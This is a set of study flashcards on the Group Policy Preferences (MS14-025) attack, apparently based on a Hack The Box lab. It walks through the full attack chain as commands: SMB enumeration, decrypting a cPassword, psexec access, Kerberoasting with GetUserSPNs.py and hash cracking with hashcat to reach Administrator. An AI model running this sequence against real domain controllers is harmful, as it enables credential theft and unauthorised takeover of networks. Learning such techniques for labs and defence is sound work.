Group Policy Preferences Attack (GPP) MS14-025 Flashcards
What are GPP attacks (5)?
Group Policy Preferences Attack (GPP) AKA MS14-025
- GPP allowed admins to create policies using embedded credentials
- These credentials were encrypted and placed in a “cPassword” attribute
- The key was accidentally released
- Patched in MS14-025 but doesn’t prevent previous uses
What is the MS14-025 attack?
Group Policy Preferences (GPP) attack
Steps of a GPP attack (8) and post exploitation (4)? (without Metasploit)
1- Scan for DC with Nmap
nmap -T5 IP
2- Find SMB shares
smbclient -L \\IP\ (empty password = anonymous connection)
3- Find an SMB share with anonymous access (here “Replication”)
smbclient \\IP\Replication
4- On the SMB share
smb: > prompt off
smb: > recurse on
smb: > mget *
5- Search for the Groups.xml file (contains the GPP embedded cPassword) (mget gives the full path, which helps to find this file)
6- Open the file and find the cPassword fields
7- Decrypt it: gpp-decrypt CPASSWORD_VALUE
8- Boom, you get the password on the last line of the output
So now you have:
- a username from the Groups.xml file “active.htb\SVC_TGS”
- a password from the decrypted cPassword value
9- Use the credentials on the DC to find a writable share
psexec.py active.htb/svc_tgs:password@IP_DC
10- If no writable share is available => Kerberoasting:
GetUserSPNs.py active.htb/svc_tgs:Password@IP_DC -request
11- Crack the hash
hashcat -m 13100 hashs.txt rockyou.txt -O
12- Log in as the Administrator account if any (Boom, get admin access)
psexec.py active.htb/Administrator:Password@IP_DC
What to expect from an nmap scan of a DC?
- Port 53 DNS
- Port 88 Kerberos
- Port 389 LDAP
- Port 636 LDAPS